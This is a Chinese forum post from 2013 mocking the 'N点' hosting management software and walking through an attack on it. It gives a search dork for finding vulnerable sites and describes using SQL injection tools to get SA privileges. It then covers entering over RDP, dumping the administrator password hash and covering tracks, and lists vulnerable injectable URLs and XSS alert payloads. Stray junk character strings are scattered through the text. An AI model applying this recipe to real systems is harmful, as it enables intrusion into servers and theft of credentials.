不得不说N点实在是一个破东西
' G8 a" u# [4 b1 Y# @2 V& i就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
6 U! y# [' C/ H% G好吧 抱怨一下就行了 接下来关键的时候到了% h" _# _. T% ?% Z+ Z
首先百度搜索关键字:inurl: (mmdatabase.asp)! N! ]4 b! p5 W! d. L8 |+ I% A
我随便列举一个: www.xxxx.com' k# H/ k* J! z- y
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=10 w6 G3 P0 `9 x, M9 \' |
扔入NBSI 或者啊D等各种傻逼工具后& J$ ~8 D6 @0 \! ?/ |. P" b% m
你们会看到是SA权限
* ^& H9 y/ ~& b, i" \! J# o果断3389 上去 hash得到administrator密码- O& O4 S# `+ {5 p/ I
擦屁股走人~3 t, L* _. I" [+ G4 O3 H3 n
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的' S# J5 r+ _1 k3 U: ^- u
5 k, \& b8 T5 `. w2 v再附上其他几个漏洞页面/ @; n; Q" T) f* r' K4 o) V
SQL:7 {2 r: J9 ?# D- C+ [. I1 }6 S$ M
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1# y; k! h0 L: J3 u$ p
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
* U* {& e; f/ Z- S) [: g- Ehttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
) V% O7 p/ k4 B" q% Ehttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
, o( A+ Z0 p3 |! QXSS证明:: S) B' O/ u7 L
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
8 B) J) r. j0 hhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
$ D# P; Y! _; shttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>7 v; U4 y0 K. ^3 B, l% @! y- D1 W
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
( m; R j; C4 x5 V( K; n1 a8 U还是星外吧 你们懂的: G' w8 u; T* `7 u
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?4 g$ F. w- U1 x4 a1 Z) h
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉0 v* z2 C; e$ T1 c! Q8 p! y7 O) q
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对